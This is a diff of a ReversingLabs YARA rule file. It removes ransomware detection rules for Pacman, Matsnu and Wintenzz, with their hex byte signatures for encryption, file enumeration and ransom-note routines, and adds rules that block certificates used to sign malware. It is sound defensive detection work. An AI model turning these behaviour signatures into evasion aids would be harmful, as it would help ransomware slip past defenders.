-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0634303a4db2631edb40a9435444f3bdc4bc6eb745c7e43a54478e54e7507403"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15666-L15682"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8c96fbd10672b0b258a80f3abaf0320540c5ff0a4636f011cfe7cfa8ccc482d0"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Pacman"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$pacman_find_encrypted_1 = {
-            28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 28
-            29 02 00 06 1F 1C 28 0E 04 00 06 [0-2] 7E 13 00 00 04 20 0F 03 00 00 28 2F 00 00 06 25
-            26 28 5D 02 00 06 [0-2] 28 6D 01 00 06 [0-2] 0B 07 13 06 16 13 05 2B 31 11 06 11 05 9A
-            0C 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2]
-            08 28 55 02 00 06 [0-2] 26 11 05 17 D6 13 05 11 05 11 06 8E B7 32 C7 1D 45 01 00 00 00
-            F6 FF FF FF 17 2D 06 D0 1E 01 00 06 26 16 0A 38 BC 01 00 00 28 0A 00 00 06 [0-2] 6F 0D
-            00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 14 20
-            B0 0F 00 00 28 2F 00 00 06 [0-2] 1F 0A 8D 76 00 00 01 13 07 11 07 16 20 BF 0F 00 00 28
-            2F 00 00 06 [0-2] A2 11 07 17 20 C2 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 18 20 C5 0F
-            00 00 28 2F 00 00 06 [0-2] A2 11 07 19 20 C8 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1A
-            20 CB 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1B 20 CE 0F 00 00 28 2F 00 00 06 [0-2] A2
-        }
-		$pacman_find_encrypted_2 = {
-            11 07 1C 20 D1 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1D 20 D4 0F 00 00 28 2F 00 00 06
-            [0-2] A2 11 07 1E 20 C2 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1F 09 20 D7 0F 00 00 28
-            2F 00 00 06 [0-2] A2 11 07 14 14 14 28 7A 04 00 06 [0-2] 28 E2 05 00 06 [0-2] 0D 28 07
-            00 00 06 28 1A 04 00 06 [0-2] 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06
-            [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 28 E2 05 00 06 [0-2] 28 36 05 00 06
-            [0-2] 2C 78 1A 45 01 00 00 00 F6 FF FF FF 7E 16 00 00 04 28 9D 02 00 06 [0-2] 28 0A 00
-            00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04
-            00 06 [0-2] 28 E2 05 00 06 [0-2] 09 16 28 23 01 00 06 28 0A 00 00 06 [0-2] 6F 0D 00 00
-            06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 28 E2 05 00
-            06 [0-2] 28 66 04 00 06 DE 0F 25 28 4E 04 00 06 13 04 28 02 03 00 06 DE 00 06 17 D6 0A
-            06 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2]
-            28 E2 04 00 06 [0-2] 3F 1B FE FF FF 1B 45 01 00 00 00 F6 FF FF FF 28 28 00 00 06 2A
-        }
-		$pacman_encrypt = {
-            28 65 02 00 06 [0-2] 0A 16 13 05 20 00 04 00 00 13 07 06 11 07 28 2A 05 00 06 [0-2] 2C
-            19 1C 45 01 00 00 00 F6 FF FF FF 17 2D 06 D0 20 01 00 06 26 11 07 13 05 2B 15 11 07 15
-            D6 13 07 11 07 17 2F D0 17 45 01 00 00 00 F6 FF FF FF 20 DA 0F 00 00 28 2F 00 00 06 [0-2]
-            11 05 28 9D 02 00 06 [0-2] 28 E2 02 00 06 [0-2] 28 6E 03 00 06 06 28 0A 03 00 06 [0-2]
-            0B 14 13 04 14 0D 1F 0E 8D 25 00 00 01 13 0B 11 0B 16 ?? 9C 11 0B 17 ?? 9C 11 0B 18
-            ?? 9C 11 0B 19 ?? 9C 11 0B 1A ?? 9C 11 0B 1B ?? 9C 11 0B 1C ?? 9C 11 0B 1D ?? 9C 11 0B
-            1E 20 ?? ?? ?? ?? 9C 11 0B 1F 09 20 ?? ?? ?? ?? 9C 11 0B 1F 0A 20 ?? ?? ?? ?? 9C 11 0B
-            1F 0B 1F ?? 9C 11 0B 1F 0C 1F ?? 9C 11 0B 1F 0D 1F ?? 9C 11 0B 13 06 02 11 06 11 05 07
-            12 04 12 03 28 1F 01 00 06 05 2C 18 18 45 01 00 00 00 F6 FF FF FF 06 11 04 09 28 96 03
-            00 06 [0-2] 0C 2B 0C 06 11 04 09 28 7E 05 00 06 [0-2] 0C 04 08 17 28 45 01 00 06 [0-2]
-            13 08 20 01 04 00 00 8D 25 00 00 01 13 09 03 11 09 16 20 00 04 00 00 28 3A 03 00 06 [0-2]
-            13 0A 11 0A 16 33 0C 1D 45 01 00 00 00 F6 FF FF FF DE 24 11 08 11 09 16 11 0A 28 F6 04
-            00 06 2B CF 11 08 2C 11 18 45 01 00 00 00 F6 FF FF FF 11 08 28 1E 03 00 06 DC DE 0C 28
-            4E 04 00 06 28 02 03 00 06 DE 00 08 28 1E 03 00 06 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $pacman_find_encrypted_1 and $pacman_find_encrypted_2 and $pacman_encrypt )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IBM" and pe.signatures [ i ] . serial == "30:76:42:e1:f3:a9:2c:6c:c2:e7:fb:6e:18:f2:dd:cb" and 1500422400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Matsnu : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_52379131A1C69263C795A7D398Db0997 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Matsnu ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2f0bddd5-bd48-5d38-84f4-2dbccbe04a46"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "478994c1-c1c4-5f11-b78f-fe237b687bef"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Matsnu.yara#L1-L116"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "76ef1b4a292f27ccd904e80f0279a7a327f7399a21f2266ef3ea959e5339ffac"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15684-L15700"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "245e994024e08add755ec704b895286c115ac00eb5aeecde98fce96f35f6e9e0"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Matsnu"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection = {
-            55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C6 45 ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B 8D 83 ?? ?? ?? ?? 8B 00 6A ?? 50
-            FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D 7D ?? 57 56 FF 93 ?? ?? ?? ?? 85 C0 74
-            ?? 57 8D BB ?? ?? ?? ?? 89 07 5F EB ?? 8D B3 ?? ?? ?? ?? 8B 36 57 8D BB ?? ?? ?? ??
-            89 37 5F 68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? EB ?? 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? 57 FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 56
-            57 FF 93 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 50 57 FF 93 ?? ?? ?? ?? 85
-            C0 74 ?? C6 00 ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8D 93 ?? ??
-            ?? ?? FF 75 ?? 52 51 56 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 4D ?? 51 57 E8 ??
-            ?? ?? ?? 85 C0 74 ?? 89 45 ?? 8D 4D ?? 51 50 E8 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF
-            93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 89 85 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ??
-            ?? 8B 45 ?? 8B 75 ?? 89 06 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 83 BD ??
-            ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D 83 ?? ?? ?? ?? 50 56 FF
-            93 ?? ?? ?? ?? 85 C0 74 ?? 40 57 8D BB ?? ?? ?? ?? 89 07 5F E9 ?? ?? ?? ?? 8D B3 ??
-            ?? ?? ?? 8B 36 57 8D BB ?? ?? ?? ?? 89 37 5F 68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8D 83 ?? ?? ?? ?? 8B 00 50 FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ??
-            ?? ?? C9 C2
-        }
-		$crypto_file = {
-            55 89 E5 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ??
-            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? E8
-            ?? ?? ?? ?? 5B 8D 83 ?? ?? ?? ?? 8B 00 85 C0 74 ?? 89 45 ?? 8D 83 ?? ?? ?? ?? 8B 00
-            85 C0 74 ?? 8D 7D ?? 8D 75 ?? 8D 4D ?? 51 56 57 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 74 ??
-            89 45 ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? FF 75 ??
-            FF 93 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? 8B 45
-            ?? 8B 5D ?? C9 C2
-        }
-		$crypt_file = {
-            55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            5B 8D BD ?? ?? ?? ?? FF 75 ?? 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D B3 ?? ?? ??
-            ?? 56 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 93 ?? ?? ?? ?? 89 45 ?? 8D 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 30 FF 93 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 4D ?? 8D 85 ?? ?? ?? ?? 6A ??
-            FF 31 50 FF 36 FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 8D B5 ?? ?? ?? ?? 51 6A ?? FF 36 68 ?? ?? ?? ?? FF 30 FF 93 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 89 45
-            ?? 6A ?? FF 75 ?? FF 93 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF
-            75 ?? FF 93 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 45 ?? 8D 7D ?? 8D 75 ?? 8D 55
-            ?? 52 56 57 FF 75 ?? FF 93 ?? ?? ?? ?? 8B 45 ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D
-            45 ?? 6A ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            FF 75 ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 8D 7D ?? 8D B5 ?? ?? ?? ?? FF 75 ?? 57 FF 75 ?? 6A ?? 6A
-            ?? 6A ?? FF 36 FF 93 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
-            ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 45 ?? 8D 45 ?? 6A ?? 50 FF 75 ??
-            FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 85 C0 74 ?? 8D 7D ?? 8D 75 ?? 8D 55 ?? 52 56 57
-            FF 75 ?? FF 93 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D B3 ??
-            ?? ?? ?? FF 06 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 93 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 50 FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 50 FF 93 ?? ?? ?? ??
-            83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2
-        }
-		$enum_files_1 = {
-            89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B E8 ??
-            ?? ?? ?? 8D 7D ?? 6A ?? FF 75 ?? 57 FF 93 ?? ?? ?? ?? 8D 7D ?? 57 FF 93 ?? ?? ?? ??
-            83 F8 ?? 74 ?? EB ?? 8D 75 ?? 56 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2
-        }
-		$enum_files_2 = {
-            55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
-            66 C7 45 ?? ?? ?? C6 45 ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B 83 7D ?? ?? 0F 84
-            ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 C0 ?? 89 45 ?? 40 50 6A ?? FF 93 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 89 45 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8D 75 ?? 56
-            FF 75 ?? FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 75 ?? FF 93 ?? ?? ?? ?? 83 F8 ??
-            0F 84 ?? ?? ?? ?? 89 45 ?? 6A ?? FF 93 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 55 ?? 8D B5
-            ?? ?? ?? ?? 52 56 FF 93 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 55 ?? 8D B5 ?? ?? ?? ?? 52
-            56 FF 93 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 40 89 45 ?? 8D BD
-            ?? ?? ?? ?? 57 FF 93 ?? ?? ?? ?? 03 45 ?? 89 45 ?? 40 50 6A ?? FF 93 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 89 45 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8D 75 ?? 56 FF 75
-            ?? FF 93 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 56 FF 75 ?? FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? A9 ?? ?? ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? E8 ?? ?? ?? ??
-            EB ?? 8D B5 ?? ?? ?? ?? FF 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75
-            ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 75 ?? FF 93 ?? ??
-            ?? ?? 85 C0 74 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF
-            75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74
-            ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $enum_files_1 and $enum_files_2 and $crypto_file and $crypt_file and $remote_connection
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "52:37:91:31:a1:c6:92:63:c7:95:a7:d3:98:db:09:97" and 1476748800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Wintenzz : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_44312Cb9A927B4111360762B4D4Bdd6D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Wintenzz ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6bf569e8-b050-51ef-a948-0eb294248d63"
-		date = "2021-11-02"
-		modified = "2021-11-02"
+		id = "9bc1a8f4-36b7-52bd-9a65-fcd8ec2acf92"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.Wintenzz.yara#L1-L83"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ff4bdf2f6ee185b98d0014b3066806fe7e25ea94f46837948bc5262440bf8a56"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15702-L15718"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8e34636ed815812af478dd01eacd5298fa2cfeb420ee2f45e055f557534cae71"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Wintenzz"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            48 8D 75 ?? 41 B8 ?? ?? ?? ?? 48 89 F1 31 D2 E8 ?? ?? ?? ?? 48 89 F9 48 89 F2 E8 ??
-            ?? ?? ?? 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 89 C6 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ??
-            ?? ?? 0F 28 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 11 00 0F 28 85 ?? ?? ??
-            ?? 0F 11 40 ?? 48 8B 8D ?? ?? ?? ?? 48 89 48 ?? 49 89 77 ?? 49 89 47 ?? 41 C7 47 ??
-            ?? ?? ?? ?? 49 8D 4F ?? 48 8D 55 ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 B6 ?? 31 C0
-            49 89 07 48 85 DB 75 ?? EB ?? E8 ?? ?? ?? ?? 48 C1 E0 ?? 49 89 47 ?? 49 C7 47 ?? ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 31 F6 49 89 07 48 85 DB 74 ?? 48 01 DB 74 ?? 41 B8 ?? ?? ??
-            ?? 48 89 F9 48 89 DA E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 41 B8 ?? ??
-            ?? ?? 4C 89 F1 E8 ?? ?? ?? ?? 40 84 F6 75 ?? 48 8B 8D ?? ?? ?? ?? 48 85 C9 74 ?? 48
-            8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 F8 48 81 C4
-            ?? ?? ?? ?? 5B 5F 5E 41 5E 41 5F 5D C3 BA
-        }
-		$encrypt_files_p1 = {
-            4C 89 75 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D
-            05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 C7 45 ?? ?? ?? ?? ??
-            48 C7 45 ?? ?? ?? ?? ?? 48 89 7D ?? 48 C7 45 ?? ?? ?? ?? ?? 48 8D 4D ?? 48 8D 55 ??
-            E8 ?? ?? ?? ?? 0F 10 45 ?? 0F 29 45 ?? 48 8B 45 ?? 48 89 45 ?? 48 8D 4D ?? 48 8D 55
-            ?? E8 ?? ?? ?? ?? 48 85 DB 74 ?? BA ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 85 C0 75
-            ?? BA ?? ?? ?? ?? 48 89 D9 E8
-        }
-		$encrypt_files_p2 = {
-            86 97 ?? ?? ?? ?? C0 74 3C ?? ?? C1 E8 ?? 28 03 00 48 ?? C0 74 2F ?? ?? FA 03 75 ??
-            48 8D 0D ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ?? 0F B6 40
-            ?? 83 F0 ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 85
-            C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA ?? 75 ?? 48 8D 0D ?? ?? ??
-            ?? 48 39 C8 0F 84 ?? ?? ?? ?? 81 38 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B
-            55 ?? E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA
-            ?? 75 ?? 48 8D 0D ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ??
-            0F B6 40 ?? 83 F0 ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ??
-            ?? 48 85 C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA ?? 75 ?? 48 8D 0D
-            ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ?? 0F B6 40 ?? 83 F0
-            ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D
-        }
-		$drop_ransom_note = {
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48 8B 8D ?? ??
-            ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48 8B 8D
-            ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48
-            8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74
-            ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85
-            D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ??
-            48 85 D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ??
-            ?? ?? 48 85 D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 84 F6
-            0F 85 ?? ?? ?? ?? 48 8B 55 ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8B 55 ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 8B 55
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_* ) ) and ( $drop_ransom_note )
